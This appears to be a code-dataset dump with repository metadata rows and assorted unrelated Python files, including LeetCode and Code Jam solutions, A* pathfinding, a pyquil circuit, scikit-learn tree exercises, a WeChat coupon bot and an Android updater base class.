num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16
reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling
# |- Env model
model_type, traffic_window_size = 'IPP', 50
stride, n_iter, adjust_offset = 2, 3, 1e-22
eval_period, eval_len = 4, 100
n_belief_bins, max_queue_len = 5, 20
Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5
traffic_params = (model_type, traffic_window_size,
stride, n_iter, adjust_offset,
eval_period, eval_len,
n_belief_bins)
queue_params = (max_queue_len,)
beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost
reward_params = (Rs, Rw, Rf, Co, Cw, beta)
# |- DynaQ
num_sim = 5
# |- Env
# |- Time
start_time = pd.to_datetime("2014-10-15 09:40:00")
total_time = pd.Timedelta(days=7)
time_step = pd.Timedelta(seconds=2)
backoff_epochs = num_buffer*memory_size+phi_length
head_datetime = start_time - time_step*backoff_epochs
tail_datetime = head_datetime + total_time
TOTAL_EPOCHS = int(total_time/time_step)
# |- Reward
rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf}
# load from processed data
session_df = pd.read_csv(
filepath_or_buffer='../data/trace_{}.dat'.format(location),
parse_dates=['startTime_datetime', 'endTime_datetime']
)
te = TrafficEmulator(
session_df=session_df, time_step=time_step,
head_datetime=head_datetime, tail_datetime=tail_datetime,
rewarding=rewarding,
verbose=2)
ts = TrafficServer(cost=(Co, Cw), verbose=2)
env_model = SJTUModel(traffic_params, queue_params, reward_params, 2)
agent = Dyna_QAgent(
env_model=env_model, num_sim=num_sim,
# Below is QAgent params
actions=actions, alpha=alpha, gamma=gamma,
explore_strategy=explore_strategy, epsilon=epsilon,
verbose=2)
c = QController(agent=agent)
emu = Emulation(te=te, ts=ts, c=c, beta=beta)
# Heavy lifting
t = time.time()
sys.stdout = sys_stdout
log_path = './log/'
if os.path.isfile(log_path+log_file_name):
print "Log file {} already exist. Experiment cancelled.".format(log_file_name)
else:
log_file = open(log_path+log_file_name,"w")
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{}%'.format(int(100.0*emu.epoch/TOTAL_EPOCHS)),
print log_file_name
time.sleep(1)
sys.stdout = log_file
while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS:
# log time
print "Epoch {},".format(emu.epoch),
left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step
right = left + emu.te.time_step
print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S"))
emu.step()
print
if emu.epoch%(0.05*TOTAL_EPOCHS)==0:
sys.stdout = sys_stdout
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{}%'.format(int(100.0*emu.epoch/TOTAL_EPOCHS)),
print log_file_name
time.sleep(1)
sys.stdout = log_file
sys.stdout = sys_stdout
log_file.close()
print
print log_file_name,
print '{:.3f} sec,'.format(time.time()-t),
print '{:.3f} min'.format((time.time()-t)/60)
| [
"[email protected]"
] | |
6fdc3db5b428914f4813bf4199befece5ed7563e | df4a7c46c46d1eca6570493b9707bdf64e54f8d3 | /py/209.minimum-size-subarray-sum.py | adaf3f0e6093c8efaad3d2fbdcb5fae7fb66b2a1 | [] | no_license | CharmSun/my-leetcode | 52a39bf719c507fb7032ed424fe857ba7340aea3 | 5325a56ba8c40d74d9fef2b19bac63a4e2c44a38 | refs/heads/master | 2023-03-29T06:39:49.614264 | 2021-03-28T16:33:52 | 2021-03-28T16:33:52 | 261,364,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | #
# @lc app=leetcode id=209 lang=python3
#
# [209] Minimum Size Subarray Sum
#
# @lc code=start
from typing import List
class Solution:
# 双指针移动
def minSubArrayLen(self, target: int, nums: List[int]) -> int:
if not nums:
return 0
left = 0
right = -1
sum = 0
length = len(nums) + 1
while left < len(nums) and right < len(nums):
if right < len(nums) - 1 and sum < target:
right += 1
sum += nums[right]
else:
sum -= nums[left]
left += 1
if sum >= target:
length = min(length, right - left + 1)
if length == len(nums) + 1:
return 0
return length
# @lc code=end
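# Example: Solution().minSubArrayLen(7, [2, 3, 1, 2, 4, 3]) -> 2 (subarray [4, 3])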
| [
"[email protected]"
] | |
e80ac8c78a628d36e3b4d0788d9adfb5968ae19d | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/flicker.py | c9770573731f1ec62ddbbc5ee7fd117eb6088ec5 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 546 | py | ii = [('CookGHP3.py', 1), ('KembFJ1.py', 1), ('TennAP.py', 1), ('CarlTFR.py', 5), ('LyttELD.py', 1), ('TalfTAC.py', 1), ('AinsWRR3.py', 1), ('BailJD1.py', 1), ('RoscTTI2.py', 1), ('GilmCRS.py', 1), ('DibdTRL2.py', 1), ('AinsWRR.py', 1), ('MedwTAI.py', 1), ('FerrSDO2.py', 1), ('TalfTIT.py', 3), ('MedwTAI2.py', 1), ('HowiWRL2.py', 1), ('MartHRW.py', 2), ('LyttELD3.py', 4), ('KembFJ2.py', 1), ('AinsWRR2.py', 1), ('BrewDTO.py', 1), ('ClarGE3.py', 1), ('RogeSIP.py', 1), ('MartHRW2.py', 1), ('MartHSI.py', 2), ('NortSTC.py', 1), ('BeckWRE.py', 1)] | [
"[email protected]"
] | |
09228ae64537dd9fb78fcabb808a96dacec36126 | 2ab391bfaadf0743da8ffee084896b999e88482d | /wx.py | a2bd1358136ac0530889f2fe820be14236fd42ec | [] | no_license | wean/coupon-windows | 552a59637ea45539bdfa70c6d1bd04626f0fdbd0 | 9565b23c7f44594f182d7a268d4ed45bdeaf8dd3 | refs/heads/master | 2020-04-05T07:11:43.024665 | 2017-11-24T08:23:50 | 2017-11-24T08:23:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,676 | py | # -*- coding:utf-8 -*-
import random
import itchat
import time
from schedule import Schedule
from search import SearchingKeyRegex
from special import Searcher
from utils import getProperty, randomSleep, reprDict
class WX(Schedule):
def __init__(self, configFile):
Schedule.__init__(self, configFile)
self.searcher = Searcher(configFile)
self.configFile = configFile
def login(self, exitCallback, uuid=None):
def isLoginned(uuid):
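            # poll up to 10 times: status 200 means logged in, 201 means waiting for confirmation on the phone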
for count in range(10):
status = int(itchat.check_login(uuid))
if status is 200:
return True
if status is 201:
print 'Wait for confirm in mobile #', count
randomSleep(1, 2)
continue
print 'Error status:', status
return False
return False
if uuid is None:
statusFile = getProperty(self.configFile, 'wechat-status-file')
itchat.auto_login(hotReload=True, statusStorageDir=statusFile)
else:
if not isLoginned(uuid):
raise Exception('Failed to login with {}'.format(uuid))
userInfo = itchat.web_init()
itchat.show_mobile_login()
itchat.get_friends(True)
itchat.start_receiving(exitCallback)
self.me = itchat.search_friends()
print self.me['NickName'], 'is working'
self.watchFriends = list()
names = getProperty(self.configFile, 'wechat-watch-friends').split(';')
for name in names:
friends = itchat.search_friends(name=name)
self.watchFriends.extend(friends)
self.watchGroups = list()
names = getProperty(self.configFile, 'wechat-watch-groups').split(';')
for name in names:
groups = itchat.search_chatrooms(name=name)
self.watchGroups.extend(groups)
self.searchReplyPlate = getProperty(self.configFile, 'search-reply-plate')
itchat.run(blockThread=False) # Run in a new thread
self.run()
@staticmethod
def sendTo(obj, plate=None, image=None):
print '================================================================'
print 'Send a message to', obj['NickName']
if plate is not None:
interval = random.random() * 10
time.sleep(interval)
ret = obj.send(plate)
print 'Result of text message:', ret['BaseResponse']['ErrMsg']
print '----------------------------------------------------------------'
print plate
print '----------------------------------------------------------------'
if image is not None:
interval = random.random() * 10
time.sleep(interval)
ret = obj.send_image(image)
print 'Result of', image, ':', ret['BaseResponse']['ErrMsg']
print '================================================================'
def text(self, msg):
for friend in self.watchFriends:
if msg['FromUserName'] == friend['UserName']:
break
else:
return
print '================================================================'
print msg['User']['NickName'], 'sends a message:'
print '----------------------------------------------------------------'
print msg['Content']
print '================================================================'
self.search(friend, msg['Content'])
def textGroup(self, msg):
for friend in self.watchGroups:
if msg['FromUserName'] == friend['UserName']:
break
else:
return
print '================================================================'
print msg['User']['NickName'], 'sends a message:'
print '----------------------------------------------------------------'
print msg['Content']
print '================================================================'
self.search(friend, msg['Content'])
def send(self, plate, image):
for friend in self.watchFriends:
WX.sendTo(friend, plate, image)
def search(self, friend, content):
content = SearchingKeyRegex.parse(content)
if content is None:
return
print 'Searching', content
WX.sendTo(friend, self.searchReplyPlate.format(content.replace('#', ' ')))
if not self.searcher.search(content):
return
WX.sendTo(friend, self.searcher.plate, self.searcher.image)
| [
"[email protected]"
] | |
cb97bf7ae5fc7b209d27f00b58948f0f6626da16 | 8d38f23ec63e75f433d5de33c5d9bc51c9d7ac90 | /choco_py/03/__init__.py | f9160e38a2c85aee2b289c5caaf6fd40b73d3da4 | [] | no_license | aliwo/ChocoPy | 4a957468ef38a3bfcd99f112541e6e5b0e2adbdc | eb339c4103e5400c2cf8435b1d6af5f7b3b60548 | refs/heads/master | 2023-05-27T09:38:28.609554 | 2019-10-19T12:09:03 | 2019-10-19T12:09:03 | 211,509,685 | 5 | 1 | null | 2023-05-01T21:15:21 | 2019-09-28T14:06:06 | Python | UTF-8 | Python | false | false | 100 | py | # Now the choco variables represent the amount of chocolate each one currently holds.
| [
"[email protected]"
] | |
10bd16b2629d3c226a90fa9ed757fd210049d940 | 2e1c1558f6fcb12a57449f9f6f0db6f1cbf38dd6 | /tests/integrations/test_package/config/test.py | 1523cb68f132b4ed41f31b404461758a9e2d19e6 | [
"MIT"
] | permissive | MasoniteFramework/masonite | ca51bf3d0e4777e624b3a9e94d1360936fb8006d | e8e55e5fdced9f28cc8acb1577457a490e5b4b74 | refs/heads/4.0 | 2023-09-01T18:59:01.331411 | 2022-11-05T01:29:29 | 2022-11-05T01:29:29 | 113,248,605 | 2,173 | 185 | MIT | 2023-04-02T02:29:18 | 2017-12-06T00:30:22 | Python | UTF-8 | Python | false | false | 29 | py | PARAM_1 = "test"
PARAM_2 = 1
| [
"[email protected]"
] | |
beead89528382b978348836d26fab1b78be43800 | 26e4bea46942b9afa5a00b9cde9a84f2cc58e3c9 | /pygame/Astar/implementation.py | 4965fc01f99a6ab2206ed2468d00869b3bb21107 | [] | no_license | MeetLuck/works | 46da692138cb9741a913d84eff6822f107510dc7 | ab61175bb7e2ed5c5113bf150e0541ae18eb04c4 | refs/heads/master | 2020-04-12T05:40:25.143075 | 2017-08-21T17:01:06 | 2017-08-21T17:01:06 | 62,373,576 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,781 | py | # Sample code from http://www.redblobgames.com/pathfinding/
# Copyright 2014 Red Blob Games <[email protected]>
#
# Feel free to use this code in your own projects, including commercial projects
# License: Apache v2.0 <http://www.apache.org/licenses/LICENSE-2.0.html>
from __future__ import print_function
class SimpleGraph:
def __init__(self):
self.edges = {}
def neighbors(self, id):
return self.edges[id]
example_graph = SimpleGraph()
example_graph.edges = {
'A': ['B'],
'B': ['A', 'C', 'D'],
'C': ['A'],
'D': ['E', 'A'],
'E': ['B']
}
import collections
class Queue:
def __init__(self):
self.elements = collections.deque()
def empty(self):
return len(self.elements) == 0
def put(self, x):
self.elements.append(x)
def get(self):
return self.elements.popleft()
# utility functions for dealing with square grids
def from_id_width(id, width):
return (id % width, id // width)
def draw_tile(graph, id, style, width):
r = "."
if 'number' in style and id in style['number']: r = "%d" % style['number'][id]
if 'point_to' in style and style['point_to'].get(id, None) is not None:
(x1, y1) = id
(x2, y2) = style['point_to'][id]
if x2 == x1 + 1: r = "\u2192"
if x2 == x1 - 1: r = "\u2190"
if y2 == y1 + 1: r = "\u2193"
if y2 == y1 - 1: r = "\u2191"
if 'start' in style and id == style['start']: r = "A"
if 'goal' in style and id == style['goal']: r = "Z"
if 'path' in style and id in style['path']: r = "@"
if id in graph.walls: r = "#" * width
return r
def draw_grid(graph, width=2, **style):
for y in range(graph.height):
for x in range(graph.width):
print("%%-%ds" % width % draw_tile(graph, (x, y), style, width), end="")
print()
# data from main article
DIAGRAM1_WALLS = [from_id_width(id, width=30) for id in [21,22,51,52,81,82,93,94,111,112,123,124,133,134,141,142,153,154,163,164,171,172,173,174,175,183,184,193,194,201,202,203,204,205,213,214,223,224,243,244,253,254,273,274,283,284,303,304,313,314,333,334,343,344,373,374,403,404,433,434]]
class SquareGrid:
def __init__(self, width, height):
self.width = width
self.height = height
self.walls = []
def in_bounds(self, id):
(x, y) = id
return 0 <= x < self.width and 0 <= y < self.height
def passable(self, id):
return id not in self.walls
def neighbors(self, id):
(x, y) = id
results = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]
if (x + y) % 2 == 0: results.reverse() # aesthetics
results = filter(self.in_bounds, results)
results = filter(self.passable, results)
return results
class GridWithWeights(SquareGrid):
def __init__(self, width, height):
SquareGrid.__init__(self,width, height)
self.weights = {}
def cost(self, from_node, to_node):
return self.weights.get(to_node, 1)
diagram4 = GridWithWeights(10, 10)
diagram4.walls = [(1, 7), (1, 8), (2, 7), (2, 8), (3, 7), (3, 8)]
diagram4.weights = {loc: 5 for loc in [(3, 4), (3, 5), (4, 1), (4, 2),
(4, 3), (4, 4), (4, 5), (4, 6),
(4, 7), (4, 8), (5, 1), (5, 2),
(5, 3), (5, 4), (5, 5), (5, 6),
(5, 7), (5, 8), (6, 2), (6, 3),
(6, 4), (6, 5), (6, 6), (6, 7),
(7, 3), (7, 4), (7, 5)]}
import heapq
class PriorityQueue:
def __init__(self):
self.elements = []
def empty(self):
return len(self.elements) == 0
def put(self, item, priority):
heapq.heappush(self.elements, (priority, item))
def get(self):
return heapq.heappop(self.elements)[1]
def dijkstra_search(graph, start, goal):
frontier = PriorityQueue()
frontier.put(start, 0)
came_from = {}
cost_so_far = {}
came_from[start] = None
cost_so_far[start] = 0
while not frontier.empty():
current = frontier.get()
if current == goal:
break
for next in graph.neighbors(current):
new_cost = cost_so_far[current] + graph.cost(current, next)
if next not in cost_so_far or new_cost < cost_so_far[next]:
cost_so_far[next] = new_cost
priority = new_cost
frontier.put(next, priority)
came_from[next] = current
return came_from, cost_so_far
def reconstruct_path(came_from, start, goal):
current = goal
path = [current]
while current != start:
current = came_from[current]
path.append(current)
path.append(start) # optional
path.reverse() # optional
return path
def heuristic(a, b):
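    # Manhattan distance between grid cells a and b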
(x1, y1) = a
(x2, y2) = b
return abs(x1 - x2) + abs(y1 - y2)
def a_star_search(graph, start, goal):
frontier = PriorityQueue()
frontier.put(start, 0)
came_from = {}
cost_so_far = {}
came_from[start] = None
cost_so_far[start] = 0
while not frontier.empty():
current = frontier.get()
if current == goal:
break
for next in graph.neighbors(current):
new_cost = cost_so_far[current] + graph.cost(current, next)
if next not in cost_so_far or new_cost < cost_so_far[next]:
cost_so_far[next] = new_cost
priority = new_cost + heuristic(goal, next)
frontier.put(next, priority)
came_from[next] = current
return came_from, cost_so_far
| [
"[email protected]"
] | |
bbbb9c609651e91e3a3c15c139ff1b5813c22879 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2333.py | c971dffe1465e621fa1a309de3e74ac9949af7f2 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | # qubit number=4
# total number=29
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += CNOT(0,3) # number=14
prog += X(3) # number=15
prog += RX(1.8001325905069514,3) # number=18
prog += CNOT(0,3) # number=16
prog += H(1) # number=22
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += H(0) # number=5
prog += X(3) # number=24
prog += H(1) # number=6
prog += X(1) # number=25
prog += H(2) # number=7
prog += H(3) # number=8
prog += CNOT(1,0) # number=26
prog += Z(1) # number=27
prog += CNOT(1,0) # number=28
prog += H(0) # number=9
prog += CNOT(2,0) # number=10
prog += X(1) # number=17
prog += CNOT(2,0) # number=11
prog += Y(0) # number=12
prog += Y(0) # number=13
prog += CNOT(2,1) # number=23
prog += X(0) # number=19
prog += X(0) # number=20
# circuit end
return prog
def summarise_results(bitstrings) -> dict:
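    """Tally how many times each measured bitstring occurred."""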
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil2333.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"[email protected]"
] | |
fbddef4b9d48e173fddbe92424567a8926db63a3 | 94c7440e7f1d2fdbe4a1e26b9c75a94e49c14eb4 | /leetcode/303.py | 3e11c0d02ea85837838c1abfd9fcbb8f9d209292 | [
"Apache-2.0"
] | permissive | windniw/just-for-fun | 7ddea4f75cf3466a400b46efe36e57f6f7847c48 | 44e1ff60f8cfaf47e4d88988ee67808f0ecfe828 | refs/heads/master | 2022-08-18T09:29:57.944846 | 2022-07-25T16:04:47 | 2022-07-25T16:04:47 | 204,949,602 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | """
link: https://leetcode.com/problems/range-sum-query-immutable
problem: answer offline range-sum queries over an array
solution: precompute prefix sums, s[i] = sum(nums[:i])
"""
class NumArray:
def __init__(self, nums: List[int]):
self.s = [0 for _ in range(len(nums) + 1)]
for i in range(1, len(nums) + 1):
self.s[i] = self.s[i - 1] + nums[i - 1]
def sumRange(self, i: int, j: int) -> int:
return self.s[j + 1] - self.s[i]
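# Example: NumArray([-2, 0, 3, -5, 2, -1]).sumRange(0, 2) -> 1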
| [
"[email protected]"
] | |
150ada0104f487967baa8037bdf9800d1d660c71 | d10c5d3603e027a8fd37115be05e62634ec0f0a5 | /13_Machine-Learning-with-Tree-Based-Models-in-Python/13_ex_1-12.py | 8bc8ee02a70ea444f217bbab5bc0d3c2c3a249c6 | [] | no_license | stacygo/2021-01_UCD-SCinDAE-EXS | 820049125b18b38ada49ffc2036eab33431d5740 | 027dc2d2878314fc8c9b2796f0c2e4c781c6668d | refs/heads/master | 2023-04-29T01:44:36.942448 | 2021-05-23T15:29:28 | 2021-05-23T15:29:28 | 335,356,448 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,032 | py | # Exercise 1-12: Linear regression vs regression tree
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.tree import DecisionTreeRegressor
from sklearn.metrics import mean_squared_error as MSE
SEED = 3
df = pd.read_csv('input/auto.csv')
y = df['mpg']
X = pd.get_dummies(df.drop(['mpg'], axis=1))
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=SEED)
dt = DecisionTreeRegressor(max_depth=8, min_samples_leaf=0.13, random_state=SEED)
dt.fit(X_train, y_train)
y_pred = dt.predict(X_test)
mse_dt = MSE(y_test, y_pred)
rmse_dt = mse_dt**(1/2)
lr = LinearRegression()
lr.fit(X_train, y_train)
# Predict test set labels
y_pred_lr = lr.predict(X_test)
# Compute mse_lr
mse_lr = MSE(y_test, y_pred_lr)
# Compute rmse_lr
rmse_lr = mse_lr**(1/2)
# Print rmse_lr
print('Linear Regression test set RMSE: {:.2f}'.format(rmse_lr))
# Print rmse_dt
print('Regression Tree test set RMSE: {:.2f}'.format(rmse_dt))
| [
"[email protected]"
] | |
f13dd503a9b25ec0cf197860872374891737e452 | 24c84c5b93cd816976d370a99982f45e0d18a184 | /ArraysProblem/Python/FindAllNumbersDisappearedinAnArray.py | 25420fb3ce55ce8bdb7c4beb3f9a49d0977405c8 | [] | no_license | purushottamkaushik/DataStructuresUsingPython | 4ef1cf33f1af3fd25105a45be4f179069e327628 | e016fe052c5600dcfbfcede986d173b401ed23fc | refs/heads/master | 2023-03-12T13:25:18.186446 | 2021-02-28T18:21:37 | 2021-02-28T18:21:37 | 343,180,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | class Solution:
def findDisappearedNumbers(self, nums):
        lst = []
        if not nums:
            return lst
        for i in range(len(nums)):
            if i + 1 not in nums:
                lst.append(i + 1)
        return lst
def findDisappearedNumbers2(self, nums):
s = set(nums)
n = len(nums) + 1
lst = []
for i in range(1,n):
if i not in s:
lst.append(i)
return lst
s = Solution().findDisappearedNumbers([1,1])
print(s) | [
"[email protected]"
] | |
ce59e45ee8cddd99cedd8e16aefcff92641a326a | 8214e7369f2b86f19602eaffe9e8072f336391bb | /tasks.py | e4ab65a9167e0813e7287c98ba19959386973525 | [
"BSD-3-Clause"
] | permissive | pydev-git/cookiecutter_flask_docker | 27dc47e69a957bd89aeb76db13cc0a08897cd467 | 0bbe0f366d0d8d914b02518c94f5ff75d03386b5 | refs/heads/master | 2021-06-01T11:30:30.912658 | 2016-07-27T08:05:18 | 2016-07-27T08:05:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Invoke tasks."""
import os
import json
import shutil
from invoke import task, run
HERE = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(HERE, 'cookiecutter.json'), 'r') as fp:
COOKIECUTTER_SETTINGS = json.load(fp)
# Match default value of app_name from cookiecutter.json
COOKIE = os.path.join(HERE, COOKIECUTTER_SETTINGS['app_name'])
REQUIREMENTS = os.path.join(COOKIE, 'requirements', 'dev.txt')
@task
def build():
"""Build the cookiecutter."""
run('cookiecutter {0} --no-input'.format(HERE))
@task
def clean():
"""Clean out generated cookiecutter."""
if os.path.exists(COOKIE):
shutil.rmtree(COOKIE)
print('Removed {0}'.format(COOKIE))
else:
print('App directory does not exist. Skipping.')
def _run_manage_command(command):
run('python {0} {1}'.format(os.path.join(COOKIE, 'manage.py'), command), echo=True)
@task(pre=[clean, build])
def test():
"""Run lint commands and tests."""
run('pip install -r {0} --ignore-installed'.format(REQUIREMENTS), echo=True)
os.chdir(COOKIE)
_run_manage_command('lint')
_run_manage_command('test')
| [
"[email protected]"
] | |
e06215fdfb4e2456cf5f6f26ef24b108051d7371 | cd9eb87e3e1b04e6f421377eff02514de05c98e2 | /learn_SciPy/scikit-learn/User Guide/1. Supervised learning/1.10. Decision Trees.py | 2e0907d0cc61331fa0146ca0c4f1677688f35028 | [] | no_license | zhaojinxi/learn_python | 45f116f9729bbf19d9bb4a574b06e0ec41f754dc | 07b4a5a231e39b6d2c28f98e99a3a8fe3cb534c4 | refs/heads/master | 2021-06-05T22:00:02.528023 | 2020-03-22T04:19:22 | 2020-03-22T04:19:22 | 129,857,802 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,079 | py | import sklearn.tree
import sklearn.datasets
import graphviz
#1.10.1. Classification
X = [[0, 0], [1, 1]]
Y = [0, 1]
clf = sklearn.tree.DecisionTreeClassifier()
clf = clf.fit(X, Y)
clf.predict([[2., 2.]])
clf.predict_proba([[2., 2.]])
iris = sklearn.datasets.load_iris()
clf = sklearn.tree.DecisionTreeClassifier()
clf = clf.fit(iris.data, iris.target)
dot_data = sklearn.tree.export_graphviz(clf, out_file=None)
graph = graphviz.Source(dot_data)
graph.render("iris")
dot_data = sklearn.tree.export_graphviz(clf, out_file=None, feature_names=iris.feature_names, class_names=iris.target_names, filled=True, rounded=True, special_characters=True)
graph = graphviz.Source(dot_data)
graph
clf.predict(iris.data[:1, :])
clf.predict_proba(iris.data[:1, :])
#1.10.2. Regression
X = [[0, 0], [2, 2]]
y = [0.5, 2.5]
clf = sklearn.tree.DecisionTreeRegressor()
clf = clf.fit(X, y)
clf.predict([[1, 1]])
#1.10.3. Multi-output problems
#1.10.4. Complexity
#1.10.5. Tips on practical use
#1.10.6. Tree algorithms: ID3, C4.5, C5.0 and CART
#1.10.7. Mathematical formulation | [
"[email protected]"
] | |
ab37819178678efc8832a481c7d0f60c89cf7dfe | c27e78d35cdc802e4790280c384a0f97acf636ef | /src/rulesTest.py | c7cda2cbd1a74e52e447aefbc5576b0f6f3b5dc3 | [] | no_license | undersea/Special_Topic | 99e424d9e443523a4d880ef478455bb75d7c82cd | 7bf7ed2c92b864d99790b927965bad819bfb7cfb | refs/heads/master | 2020-03-25T04:01:26.909441 | 2011-05-30T03:26:53 | 2011-05-30T03:26:53 | 3,587,506 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | from unittest import TestCase, main
from rules import Degree
class TestRules(TestCase):
def setUp(self):
print "setUp"
self.rules = Degree()
def tearDown(self):
print "tearDown"
del self.rules
def testAdd(self):
count = len(self.rules.rules)
rule = ("one of","one")
self.rules.add(rule)
self.assertEqual(count, 0)
self.assertEqual(len(self.rules.rules), 1)
def testDelete(self):
rule = ("one of","one")
self.rules.rules.append(rule)
count = len(self.rules.rules)
self.assertEqual(count, 1)
self.rules.delete(rule)
self.assertEqual(len(self.rules.rules), 0)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
4698bbd10d6f9865b9e14c4ccd5f0c59b5bd7996 | 8f506513cb73d9bdb5dbdd9084aaba020b1efbea | /Course_1-Algorithmic_Toolbox/Week-1/Excercise_Challenges/2_maximum_pairwise_product/max_pairwise_product.py | 16ef706e59671dba4d782c766223be8cf322274f | [] | no_license | KhanAjmal007/Data-Structures-and-Algorithms-Specialization-Coursera | 1255ecf877ecd4a91bda8b85e9c96566fe6d5e4d | ab6e618c5d8077febb072091e80c16f5f1a15465 | refs/heads/master | 2023-03-21T04:18:04.580423 | 2020-07-11T07:18:06 | 2020-07-11T07:18:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | def max_pairwise_product(numbers):
max1 = -999
max2 = -9999
for value in numbers:
if value > max1:
max2 = max1
max1 = value
elif value > max2:
max2 = value
return max1 * max2
if __name__ == '__main__':
input_n = int(input())
input_numbers = [int(x) for x in input().split()]
print(max_pairwise_product(input_numbers))
| [
"[email protected]"
] | |
f2f4d6b715cc9b11ba5174b51906804ad1a1ca7e | 544cfadc742536618168fc80a5bd81a35a5f2c99 | /tools/external_updater/base_updater.py | 18d4435858c7a22b295ca26455f4abbaf44d16d4 | [] | no_license | ZYHGOD-1/Aosp11 | 0400619993b559bf4380db2da0addfa9cccd698d | 78a61ca023cbf1a0cecfef8b97df2b274ac3a988 | refs/heads/main | 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,590 | py | # Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for all updaters."""
from pathlib import Path
import fileutils
# pylint: disable=import-error
import metadata_pb2 # type: ignore
class Updater:
"""Base Updater that defines methods common for all updaters."""
def __init__(self, proj_path: Path, old_url: metadata_pb2.URL,
old_ver: str) -> None:
self._proj_path = fileutils.get_absolute_project_path(proj_path)
self._old_url = old_url
self._old_ver = old_ver
self._new_url = metadata_pb2.URL()
self._new_url.CopyFrom(old_url)
self._new_ver = old_ver
self._has_errors = False
def is_supported_url(self) -> bool:
"""Returns whether the url is supported."""
raise NotImplementedError()
def check(self) -> None:
"""Checks whether a new version is available."""
raise NotImplementedError()
def update(self) -> None:
"""Updates the package.
Has to call check() before this function.
"""
raise NotImplementedError()
@property
def project_path(self) -> Path:
"""Gets absolute path to the project."""
return self._proj_path
@property
def current_version(self) -> str:
"""Gets the current version."""
return self._old_ver
@property
def current_url(self) -> metadata_pb2.URL:
"""Gets the current url."""
return self._old_url
@property
def latest_version(self) -> str:
"""Gets latest version."""
return self._new_ver
@property
def latest_url(self) -> metadata_pb2.URL:
"""Gets URL for latest version."""
return self._new_url
@property
def has_errors(self) -> bool:
"""Gets whether this update had an error."""
return self._has_errors
def use_current_as_latest(self):
"""Uses current version/url as the latest to refresh project."""
self._new_ver = self._old_ver
self._new_url = self._old_url
| [
"[email protected]"
] | |
a85110d0091d407c2364cee12549f5de1adf8a07 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5744014401732608_0/Python/ArbokEkans/C.py | 413f74cc89b84cfd4dc8d0ba77d001600a4d53ea | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | def solve():
b, m = [int(i) for i in input().split()]
if m > 2**(b-2):
return "IMPOSSIBLE"
else:
graph = construct(b)
rep = bin(m)[2:][::-1]
if m == 2**(b-2):
for key in graph:
if key != b-1:
